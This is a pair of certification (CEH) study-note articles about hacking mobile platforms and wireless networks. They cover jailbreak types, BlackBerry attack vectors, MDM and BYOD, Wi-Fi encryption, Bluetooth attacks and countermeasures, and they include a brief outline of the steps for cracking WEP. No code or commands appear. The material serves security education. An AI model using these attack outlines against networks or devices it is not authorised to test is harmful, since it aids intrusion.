iOS Jailbreak

A jailbreak is a form of rooting resulting in privilege escalation. Jailbreak is usually done to remove or bypass the factory default restrictions by using kernel patches or device customisation. Jailbreak allows root access to the device what allows users to install unofficial applications.

Types of Jailbreak

  • Userland exploits: This jailbreak allows user-level access without scaling to about-level access.
  • iBoot exploits: This jailbreak allows user-level and boot-level access.
  • Bootrom exploits: This jailbreak allows user-level and boot-level access.

Jailbreak Techniques

  • Tethered Jailbreak: A tethered jailbreak is one that temporarily pwns a handset for a single boot. After the device is turned off (or the battery dies), it cannot complete a boot cycle without the help of a computer-based jailbreak application and a physical cable connection between the device and the computer in question.
  • Semi-tethered Jailbreak: A semi-tethered jailbreak is one that permits a handset to complete a boot cycle after being pwned, but jailbreak extensions will not load until a computer-based jailbreak application is deployed over a physical cable connection between the device and the computer in question.
  • Semi-untethered Jailbreak: A semi-untethered jailbreak is one that permits a handset to complete a boot cycle after being pwned, but jailbreak extensions will not load until a side-loaded jailbreak app on the device itself is deployed.
  • Untethered Jailbreak: An untethered jailbreak is one that permits a handset to complete a boot cycle after being pwned without any interruption to jailbreak-oriented functionality.

Jailbreak Tools

There are multiple jailbreak tools such as:

  • Pangu
  • evasi0n7
  • LimeRaln
  • BlackRaln

Hacking Windows Phone OS

Windows Phone OS is another mobile operative system developed by Microsoft. Windows Phone 8 is the second generation of the Windows Phone mobile operating system from Microsoft. It was released on October 29, 2012, and, like its predecessor, it features a flat user interface based on the Metro design language. It was succeeded by Windows Phone 8.1, which was unveiled on April 2, 2014.

Windows Phone 8 replaces the Windows CE-based architecture used in Windows Phone 7 with the Windows NT kernel found in Windows 8. Current Windows Phone 7 devices cannot run or update to Windows Phone 8, and new applications compiled specifically for Windows Phone 8 are not made available for Windows Phone 7 devices. Developers can make their apps available on both Windows Phone 7 and Windows Phone 8 devices by targeting both platforms via the proper SDKs in Visual Studio.

Windows Phone 8 devices are manufactured by Microsoft Mobile (formerly Nokia), HTC, Samsung and Huawei.

Some features supported are:

  • Native code support (C++)
  • NFC
  • Remote device management
  • VoIP and video chat integration
  • UEFI and firmware over the air for windows phone update
  • App sandboxing

Hacking BlackBerry

BlackBerry OS is a proprietary mobile operating system designed specifically for Research In Motion’s (RIM) BlackBerry devices. The BlackBerry OS runs on Blackberry variant phones.

The BlackBerry OS is designed for smartphone environments and is best known for its robust support for push Internet email and was considered as the most prominent and secure mobile phones.

Traditionally, BlackBerry applications are written using Java, particularly the Java Micro Edition (Java ME) platform. However, RIM introduced the BlackBerry Web development platform in 2010, which makes use of the widget software development kit (SDK) to create small standalone Web apps made up of HTML, CSS and JavaScript code.

BlackBerry Attack Vectors

  • Malicious code signing: It the process where attacker after obtaining a code-signing key from the code-signing service sign a malicious application and uploads it to the BlackBerry App Store to be distributed to users.
  • JAD file exploits: JAD stands for Java Application Descriptor file. Files with the .jad extension are descriptor files that are commonly used to describe the contents of a MIDlet that are created for the Java ME virtual machine. Attackers can trick users to install malicious .jad files pointing to malicious download links to obtain an application or, even, they can be crafted to run DoS attacks.

Mobile Device Management (MDM)

Mobile device management (MDM), is the process of managing everything about a mobile device. MDM includes storing essential information about mobile devices, deciding which apps can be present on the devices, locating devices, and securing devices if lost or stolen. Many businesses use a third-party mobile device management software such as Mobile Device Manager Plus to manage mobile devices. Mobile Device Management has expanded its horizons to evolve into Enterprise Mobility Management (EMM).

Mobile devices now have more capabilities than ever before, which has ultimately led to many enterprises adopting a mobile-only or mobile-first workforce. In these types of environments, both personal (BYOD) and corporate-owned mobile devices are the primary devices used for accessing or interacting with corporate data.

Mobile Device Management (MDM) is important for enterprises focussing on improving productivity and security. They allow:

  • Ease deployments
  • Efficient Integrations
  • Manage multiple device types
  • Achieve compliance
  • Enhanced security
  • Remote management

And provide some functions such as:

  • Enforcing a device to be locked after certain login failures.
  • Enforcement of strong password policies for all BYOD devices.
  • MDM can detect any attempt of hacking on BYOD devices and limit their network access for those affected devices.
  • Enforcing confidentiality by using encryption as per organizations policy.
  • Administration and implementation of Data Loss Prevention (DLP) for BYOD devices.

MDM Deployment Methods

Generally, there are two types of deployments:

On-site MDM Deployment

Involves the installation of MDM applications on local servers inside the corporate data centres or offices and its managed by local staff available on-premises.

The major advantage is the granular control over the management of the BYOD devices, which, in some extend, extends the security.

The on-site MDM deployment has the next components or areas:

  • Data centre: All the necessary services and serves to manage the infrastructure, connectivity, access and security policies.
  • Internet edge: Its basic purpose is to provide connectivity to the public internet. Firewalls, filters, monitors for ingress and egress traffic and, wireless controllers and access points for guest users.
  • Services layer: Contain wireless controllers and access points used by users in the corporate environment. And sometimes services like NTP or other support services.
  • Core layer: Just like every other design, the core is the focal point of the whole network regarding routing of traffic in a corporate network environment.
  • Campus Building: A distribution layer that acts as ingress/egress point for all traffic in a campus building, where users can connect using switches or wireless access points.

Cloud-based MDM deployment

In this type of deployment, the MDM software is installed and managed by a third-party service and, this is one of the best advantages of this type due to the maintenance and troubleshooting been the responsibility of the service provider.

The cloud-based MDM deployment has the next components or areas:

  • Data centre: All the necessary services and serves to manage the infrastructure, connectivity, access and security policies.
  • Internet edge: Its basic purpose is to provide connectivity to the public internet. Firewalls, filters, monitors for ingress and egress traffic and, wireless controllers and access points for guest users.
  • WAN: Provides VPN connectivity from branch offices to the corporate office, internet access from branch offices and connectivity to cloud-based MDM application software. MAintain policies and configurations for BYOD devices connected to the corporate network.
  • WAN edge: This component act as a focal point for all ingress/egress WAN traffic from and going to branch offices.
  • Services layer: Contain wireless controllers and access points used by users in the corporate environment. And sometimes services like NTP or other support services.
  • Core layer: Just like every other design, the core is the focal point of the whole network regarding routing of traffic in a corporate network environment.
  • Branch offices: This component is compromised of few routers acting as the focal point of ingress and egress traffic out of branch offices. USer can connect using access switches or wireless access points.

Bring Your Own Device (BYOD)

The BOYD concept makes life easier for users but represents some new challenges for network engineers and designers. Network engineers and designers need to find a way to balance the constant mutation of their networks and the offering of seamless wireless connectivity with maintaining good security for organisations.

Some reason to implement BYOD solutions are:

  • A wide variety of consumer devices: Smartphones, tablets, laptops and others of multiple brands and types belonging to users need to be, nowadays, added to the network and, they need to complain with organisation’s policies and, of course, have all the connectivity.
  • No schedules: Not any more strict working hours, users can join a network when is convenient for them early, late, launch time even weekends.
  • Deslocalisation: Not just working from offices buildings or corporative environments, users can now connect from everywhere and have the need to access to the company resources.

BYOD Architecture Framework

Some elements that can be found in BYOD environments are:

  • BYOD devices: All the devices allowed to connect to the corporate network to allow users to perform their job.
  • Wireless access points: They provide wireless connectivity on-premises and they are installed in the physical network of a company.
  • Wireless LAN controllers: WLAN controllers provide centralised management and monitoring of the WLAN solution. They are integrated with the identity service engine to enforce the authentication and authorisation of the BYOW devices.
  • Identity service engine: They implement the authentication, authorisation and accounting for end-points devices.
  • VPN solutions: They provide connectivity to corporate networks for end-users allowing confidentiality of data.
  • Integrated services router (ISR): Prefered in BYOD architectures to provide WAN and Internet access in corporate environments to BYOD devices.
  • Aggregation services router (ASR): It provides WAN and Internet access in corporate environments and acts as aggregation points for connections coming from the branches and home-offices.
  • Cloud web security (CWS): It provides enhanced web security for all BYOD devices that access the Internet using public 3G/4G networks.
  • Adaptive security appliance (ASA): It provides standard security solutions at the Internet edge like IDS or IPS and acts as a termination point for the VPN connections.
  • RSA SecurID: It provides one-time passwords to access network applications for BYOD devices.
  • Active Directory: It provides central command and control of domain users, computers and network printers. It restricts access to network resources.
  • Certificate authority: It allows to provide access to the network only to BYOD devices that have a valid certificate installed.

Mobile Security Guidelines

Mobil devices have a big amount of in-build security features and measures, this together with tools available on the Stores can craft good security but, in addition, some beneficial guidelines to secure mobile phones are as follows:

  • Avoid auto-upload of files and photos.
  • Perform security assessments of applications.
  • Turn off the Bluetooth.
  • Allow only necessary GSP-enabled applications.
  • Do not connect to open networks or public networks unless it is necessary.
  • Install applications for trusted or official stores.
  • Configure strong passwords.
  • Use mobile device management software.
  • Use remote wipe services.
  • Update operative systems.
  • Do not allow rooting/jailbreaking.
  • Encrypt your phone.
  • Periodic backups.
  • Filter emails.
  • Configure application certification rules.
  • Configure mobile device policies.
  • Configure auto-lock.
CEH (XVIII): Hacking Mobile Platforms

CEH (XVII): Hacking Wireless Networks

The index of this series of articles can be found here.

A wireless network allows devices to stay connected to the network but roam untethered to any wires. Access points amplify Wi-Fi signals, so a device can be far from a router but still be connected to the network. Previously it was thought that wired networks were faster and more secure than wireless networks. But continual enhancements to wireless network technology such as the Wi-Fi 6 networking standard have eroded speed and security differences between wired and wireless networks.

Usually, wireless communications rely on radio communications. Different frequency ranges are used for different types of wireless technologies depending upon the requirements.

Wireless Terminology

GSM

GSM (Global System for Mobile communications) is an open, digital cellular technology used for transmitting mobile voice and data services. GSM supports voice calls and data transfer speeds of up to 9.6 kbps, together with the transmission of SMS (Short Message Service).

GSM operates in the 900MHz and 1.8GHz bands in Europe and the 1.9GHz and 850MHz bands in the US. GSM services are also transmitted via 850MHz spectrum in Australia, Canada and many Latin American countries. The use of harmonised spectrum across most of the globe, combined with GSM’s international roaming capability, allows travellers to access the same mobile services at home and abroad. GSM enables individuals to be reached via the same mobile number in up to 219 countries.

Terrestrial GSM networks now cover more than 90% of the world’s population. GSM satellite roaming has also extended service access to areas where terrestrial coverage is not available.

Access Point

A wireless access point (WAP), or more generally just access point (AP), is a networking hardware device that allows other Wi-Fi devices to connect to a wired network. The AP usually connects to a router (via a wired network) as a standalone device, but it can also be an integral component of the router itself. An AP is differentiated from a hotspot which is a physical location where Wi-Fi access is available.

SSID

A Wi-Fi network’s SSID is the technical term for its network name. SSID stands for “Service Set Identifier”. Under the IEEE 802.11 wireless networking standard, a “service set” refers to a collection of wireless networking devices with the same parameters. So, the SSID is the identifier (name) that tells you which service set (or network) to join.

BSSID

The BSSID is the MAC address of the wireless access point (WAP) generated by combining the 24-bit Organization Unique Identifier (the manufacturer’s identity) and the manufacturer’s assigned 24-bit identifier for the radio chipset in the WAP.

ISM Band

Industrial, Scientific and Medical band, as a part of the radio spectrum that can be used for any purpose without a license in most countries. 902-928 MHz, 2.4 GHz and 5.7-5.8 GHz bands are used for machines that emitted radio frequencies, industrial heaters and microwave ovens, but not for radio communications.

Orthogonal Frequency Division Multiplexing (OFDM)

Orthogonal Frequency Division Multiplexing is a digital transmission technique that uses a large number of carriers spaced apart at slightly different frequencies. First promoted in the early 1990s for wireless LANs, OFDM is used in many wireless applications including Wi-Fi, WiMAX, LTE, ultra-wideband (UMB), as well as digital radio and TV broadcasting in Europe and Japan. It is also used in land-based ADSL (see OFDMA).

Frequency-hopping Spread Spectrum (FHSS)

Frequency-hopping spread spectrum (FHSS) is a method of transmitting radio signals by rapidly changing the carrier frequency among many distinct frequencies occupying a large spectral band. The changes are controlled by a code known to both transmitter and receiver. FHSS is used to avoid interference, to prevent eavesdropping, and to enable code-division multiple access (CDMA) communications.

Types of Networks

Types of wireless networks deployed in a geographical area can be categorised as:

  • Wireless personal area network (WPAN)
  • Wireless local area network (WLAN)
  • Wireless metropolitan area network (WMAN)
  • Wireless wide area network (WWAN)

However, a wireless network can be defined in different types depending upon the deployment scenarios. The following are some of the wireless network types that are used in different scenarios:

  • Extension to a wired network
  • Multiple access points
  • 3G/4G hotspot

Wireless Standards

StandardFrequencyModulationSpeed
802.11a5 GHzOFDM54 Mbps
802.11b2.4 GHzDSSs11 Mbps
802.11g2.4 GHzOFDM, DSSS54 Mbps
802.11n5 GHzOFDM54 Mbps
802.16 (WIMAX)10 – 66 GHzOFDM70 – 1000 Mbps
Bluetooth2.4 GHz1 – 3 Mbps

Wi-Fi

Wi-Fi is a family of wireless networking technologies, based on the IEEE 802.11 family of standards, which are commonly used for local area networking of devices and Internet access. Wi‑Fi is a trademark of the non-profit Wi-Fi Alliance, which restricts the use of the term Wi-Fi Certified to products that successfully complete interoperability certification testing.

They transmit at frequencies of 2.4 GHz or 5 GHz. This frequency is considerably higher than the frequencies used for cell phones, walkie-talkies and televisions. The higher frequency allows the signal to carry more data.

They use 802.11 networking standards, which come in several flavours:

  • 802.11a transmits at 5 GHz and can move up to 54 megabits of data per second. It also uses orthogonal frequency-division multiplexing (OFDM), a more efficient coding technique that splits that radio signal into several sub-signals before they reach a receiver. This greatly reduces interference.
  • 802.11b is the slowest and least expensive standard. For a while, its cost made it popular, but now it is becoming less common as faster standards become less expensive. 802.11b transmits in the 2.4 GHz frequency band of the radio spectrum. It can handle up to 11 megabits of data per second, and it uses complementary code keying (CCK) modulation to improve speeds.
  • 802.11g transmits at 2.4 GHz like 802.11b, but it is a lot faster – it can handle up to 54 megabits of data per second. 802.11g is faster because it uses the same OFDM coding as 802.11a.
  • 802.11n is the most widely available of the standards and is backwards compatible with a, b and g. It significantly improved speed and range over its predecessors. For instance, although 802.11g theoretically moves 54 megabits of data per second, it only achieves real-world speeds of about 24 megabits of data per second because of network congestion. 802.11n, however, reportedly can achieve speeds as high as 140 megabits per second. 802.11n can transmit up to four streams of data, each at a maximum of 150 megabits per second, but most routers only allow for two or three streams.
  • 802.11ac is the newest standard as of early 2013. It has yet to be widely adopted and is still in draft form at the Institute of Electrical and Electronics Engineers (IEEE), but devices that support it are already on the market. 802.11ac is backwards compatible with 802.11n (and therefore the others, too), with n on the 2.4 GHz band and ac on the 5 GHz band. It is less prone to interference and far faster than its predecessors, pushing a maximum of 450 megabits per second on a single stream, although real-world speeds may be lower. Like 802.11n, it allows for transmission on multiple spatial streams – up to eight, optionally. It is sometimes called 5G WiFi because of its frequency band, sometimes Gigabit WiFi because of its potential to exceed a gigabit per second on multiple streams and sometimes Very High Throughput (VHT) for the same reason.

Wi-Fi Authentication Modes

There are different authentication methods for WiFi-based networks:

Open Authentication to the Access Point

Open authentication allows any device to authenticate and then attempt to communicate with the access point. Using open authentication, any wireless device can authenticate with the access point, but the device can communicate only if it is Wired Equivalent Privacy (WEP) keys match the access point’s WEP keys. Devices that are not using WEP do not attempt to authenticate with an access point that is using WEP. Open authentication does not rely on a RADIUS server on your network.

Shared Key Authentication to the Access Point

During shared key authentication, the access point sends an unencrypted challenge text string to any device that is attempting to communicate with the access point. The device that is requesting authentication encrypts the challenge text and sends it back to the access point. If the challenge text is encrypted correctly, the access point allows the requesting device to authenticate.

Both the unencrypted challenge and the encrypted challenge can be monitored, however, which leaves the access point open to attack from an intruder who calculates the WEP key by comparing the unencrypted and encrypted text strings. Because of this vulnerability to attack, shared key authentication can be less secure than open authentication. Like open authentication, shared key authentication does not rely on a RADIUS server on your network.

EAP Authentication to the Network

This authentication type provides the highest level of security for your wireless network. By using the Extensible Authentication Protocol (EAP) to interact with an EAP-compatible RADIUS server, the access point helps a wireless client device and the RADIUS server to perform mutual authentication and derive a dynamic unicast WEP key. The RADIUS server sends the WEP key to the access point, which uses the key for all unicast data signals that the server sends to or receives from the client. The access point also encrypts its broadcast WEP key (which is entered in the access point’s WEP key slot 1) with the client’s unicast key and sends it to the client.

MAC Address Authentication to the Network

The access point relays the wireless client device’s MAC address to a RADIUS server on your network, and the server checks the address against a list of allowed MAC addresses. Because intruders can create counterfeit MAC addresses, MAC-based authentication is less secure than EAP authentication. However, MAC-based authentication provides an alternate authentication method for client devices that do not have EAP capability. See the “Assigning Authentication Types to an SSID” section for instructions on enabling MAC-based authentication.

Combining MAC-Based, EAP, and Open Authentication

You can set up the access point to authenticate client devices that use a combination of MAC-based and EAP authentication. When you enable this feature, client devices that use 802.11 open authentications to associate to the access point first attempt MAC authentication. If MAC authentication succeeds, the client device joins the network. If MAC authentication fails, EAP authentication takes place.

Using WPA Key Management

Wi-Fi Protected Access (WPA) is a standards-based, interoperable security enhancement that strongly increases the level of data protection and access control for existing and future wireless LAN systems. It is derived from and will be forward-compatible with the upcoming IEEE 802.11i standard. WPA leverages TKIP (Temporal Key Integrity Protocol) for data protection and 802.1X for authenticated key management.

WPA key management supports two mutually exclusive management types: WPA and WPA-Pre-shared key (WPA-PSK). Using WPA key management, clients and the authentication server authenticate to each other using an EAP authentication method, and the client and server generate a pairwise master key (PMK). Using WPA, the server generates the PMK dynamically and passes it to the access point. Using WPA-PSK, however, you configure a pre-shared key on both the client and the access point, and that pre-shared key is used as the PMK

Wi-Fi Chalking

Wi-Fi Chalking includes several methods to detect open wireless networks, there are some of them:

  • WarWalking: Walking around to detect open networks.
  • WarChalking: Using symbols and signs to advertise open wireless networks.
  • WarFlying: Detection of open wireless using drones.
  • WarDriving: Driving around to detect open wireless networks.

Types of Wireless Antennas

  • Directional Antenna: Directional antennas, as the name implies, focus the wireless signal in a specific direction resulting in a limited coverage area. An analogy for the radiation pattern would be how a vehicle headlight illuminates the road. Types of Directional antennas include Yagi, Parabolic grid, patch and panel antennas.
  • Omni-Directional: Omni-directional antennas provide a 360º doughnut-shaped radiation pattern to provide the widest possible signal coverage in indoor and outdoor wireless applications. An analogy for the radiation pattern would be how an un-shaded incandescent light bulb illuminates a room. Types of Omni-directional antennas include “rubber duck” antennas often found on access points and routers, Omni antennas found outdoors, and antenna arrays used on cellular towers.
  • Parabolic Antenna: A parabolic antenna is an antenna that uses a parabolic reflector, a curved surface with the cross-sectional shape of a parabola, to direct the radio waves. The most common form is shaped like a dish and is popularly called a dish antenna or parabolic dish.
  • Yagi Antenna: A Yagi–Uda antenna, commonly known as a Yagi antenna, is a directional antenna consisting of multiple parallel elements in a line, usually half-wave dipoles made of metal rods.
  • Dipole Antenna: A dipole antenna or doublet is the simplest and most widely used class of antenna. The dipole is any one of a class of antennas producing a radiation pattern approximating that of an elementary electric dipole with a radiating structure supporting a line current so energized that the current has only one node at each end.

Wireless Encryption

WEP

Wired Equivalent Privacy (WEP), introduced as part of the original 802.11 standards ratified in 1997, it is probably the most used Wi-Fi Security protocol out there. It is pretty recognizable by its key of 10 or 26 hexadecimal digits (40 or 104 bits). In 2004, both WEP-40 and WEP-104 were declared deprecated. There were 128-bit (most common) and 256-bit WEP variants, but with ever-increasing computing power enable attackers to exploit numerous security flaws. All in all, this protocol is “dead“.

Breaking this encryption can be performed by following the next steps:

  • Monitor the access point channel.
  • Test injection capability of the access point.
  • Use a tool for fake authentication.
  • Sniff the packets in the network.
  • Use an encryption tool to inject packets.
  • Use a cracking tool to extract the encryption key from the initialisation vector (IV).

WPA

Wi-Fi Protected Access (WPA), became available in 2003, and it was the Wi-Fi Alliance’s direct response and replacement to the increasingly apparent vulnerabilities of the WEP encryption standard. The most common WPA configuration is WPA-PSK (Pre-Shared Key). The keys used by WPA are 256-bit, a significant increase over the 64-bit and 128-bit keys used in the WEP system.

WPA included message integrity checks (to determine if an attacker had captured/altered packets passed between the access point and client) and the Temporal Key Integrity Protocol (TKIP). TKIP employs a per-packet key system that was radically more secure than the fixed key system used by WEP. The TKIP encryption standard was later superseded by Advanced Encryption Standard (AES).

TKIP uses the same underlying mechanism as WEP and consequently is vulnerable to a number of similar attacks (e.g. Chop-Chop, MIC Key Recovery attack).

Usually, people do not attack WPA protocol directly, but a supplementary system that was rolled out with WPA – Wi-Fi Protected Setup (WPS).

WPA2

WPA2 replaced WPA. Certification began in September 2004 and from March 13, 2006, it was mandatory for all new devices to bear the Wi-Fi trademark. The most important upgrade is the mandatory use of AES algorithms (instead of the previous RC4) and the introduction of CCMP (AES CCMP, Counter Cipher Mode with Block Chaining Message Authentication Code Protocol, 128 Bit) as a replacement for TKIP (which is still present in WPA2, as a fallback system and WPA interoperability).

Wireless Threats

  • Access control attack: Attackers obtaining access to a non-authorised network.
  • Integrity and confidentiality attacks: Attacker intercept confidential information going through the network.
  • Availability attacks: Attackers prevent legitimate users to access a network.
  • Authentication attacks: Attacker try to impersonate legitimate users of the network.
  • Rogue access point attacks: By starting a rogue access point with the same SSID that an existent and legitimate one in the same location, attackers try to gain access to the network and the existent traffic.
  • Client mis-association: Placing a rogue access point outside areas where the legitimate ones are to take advantage of the auto-connect setting in user devices and capture the traffic generated.
  • Misconfigured access point attacks: Attackers gain access to existing access points by taking advantage of existing misconfigurations on the device.
  • Unauthorised association: By taking advantage of a user’s troyanised computer attackers can be allowed to connect to private networks.
  • Ad-hoc connection attacks: Ad-hoc connections tend to be insecure because they do not provide strong authentication and encryption making it possible for attackers to take advantage of them.
  • Jamming signal attacks: By simply emitting an interference signal, a jamming attacker can effectively block the communication on a wireless channel, disrupt the normal operation, cause performance issues, and even damage the control system.

Wireless Attack Methodology

  • Wi-Fi discovery: Collect information by active footprinting.
  • GPS mapping: Creation of a list of existing access points and their locations.
  • Wireless traffic analysis: Capturing packets to reveal any information about the access point and the network.
  • Launch wireless attacks: Using a tool like Aircrack-ng to run one or multiple of the possible attacks against a wireless network.

Bluetooth Hacking

Bluetooth is a wireless technology which is found in pretty much every phone you can get your hands on. But it is also in many other devices and gadgets around the home and the office, such as laptops, speakers, headphones and more. Bluetooth is used to connect devices that are in close proximity, cutting down on cables and giving you flexibility and freedom. Bluetooth is designed to allow devices to communicate wirelessly with each other over relatively short distances. It typically works over a range of fewer than 100 meters. The range has been intentionally limited in order to keep its power drain to a minimum. Bluetooth operates at 2.4 GHz frequency.

Bluetooth has a discovery feature that enables devices to be discoverable by other Bluetooth devices.

Bluetooth Attacks

  • BlueSmacking: Basically, a DoS attack against a Bluetooth device overflowing it with random packets, for example, echo packets.
  • BlueBugging: In this type of attacks, attackers exploit devices to gain access and compromise their security.
  • BlueJacking: It is the act of sending unsolicited messages to Bluetooth enabled devices.
  • BluePrinting: It is a method or technique to extract information and details about a remote device. Information such as firmware, manufacturers information, model, etc.
  • BlueSnarfing: Exploiting security vulnerabilities, attackers steal the information on Bluetooth devices.

Bluetooth Countermeasures

  • Keep checking the paired devices list.
  • Keep devices in non-discoverable mode.
  • Use a strong ping pattern.
  • Use encryption.
  • Install host-based security.
  • Do not accept an unknown or suspectable request.
  • When idle, keep your Bluetooth disabled.

Wireless Security Tools

Wireless Intrusion Prevention Systems

A wireless intrusion prevention system (WIPS) operates at the Layer 2 (data link layer) level of the Open Systems Interconnection model. WIPS can detect the presence of rogue or misconfigured devices and can prevent them from operating on wireless enterprise networks by scanning the network’s RFs for denial of service and other forms of attack.

WIDS monitors the radio spectrum for the presence of unauthorized, rogue access points and the use of wireless attack tools. The system monitors the radio spectrum used by wireless LANs, and immediately alerts a systems administrator whenever a rogue access point is detected. Conventionally it is achieved by comparing the MAC address of the participating wireless devices.

Wi-Fi Security Auditing Tool

There are several tools that can use defenders to audit, troubleshoot, detect, prevent intrusions, mitigate threats, detect rogue, protect against day-zero threats, investigate incidents (forensics) and create compliance reports helping to protect wireless networks. Tools like:

  • AirMagnet Wi-Fi Analyser
  • Motorola’s AirDefens Service Platform (ADSP)
  • Cisco Adaptive Wireless IPS
  • Aruba RFProtect

In addition, SANS has a whitepaper with the tittle Wireless Network Audits using Open Source tools.

Countermeasures

Multiple techniques and practices can be tacking to prevent attacks on wireless networks, some of them already discussed previously such as using monitoring and auditing tools, configuring strict access control policies, following best practices and techniques and, using appropriate encryption like WPA2 and strong authentication. Some of these basic techniques are:

  • Access point scanning
  • Change default parameters
  • Disable remote login for wireless devices
  • Wireless IPS deployment
  • Configuring WPA2 with AES for data protection
  • Choose strong passwords
  • RF scanning
  • MAC filtering
  • Disable SSID broadcast
  • Update software and patches
  • Blocking rogue access points
  • Per-packet authentication
  • Strong authentication
  • Enable firewall protection
  • Network management software
CEH (XVII): Hacking Wireless Networks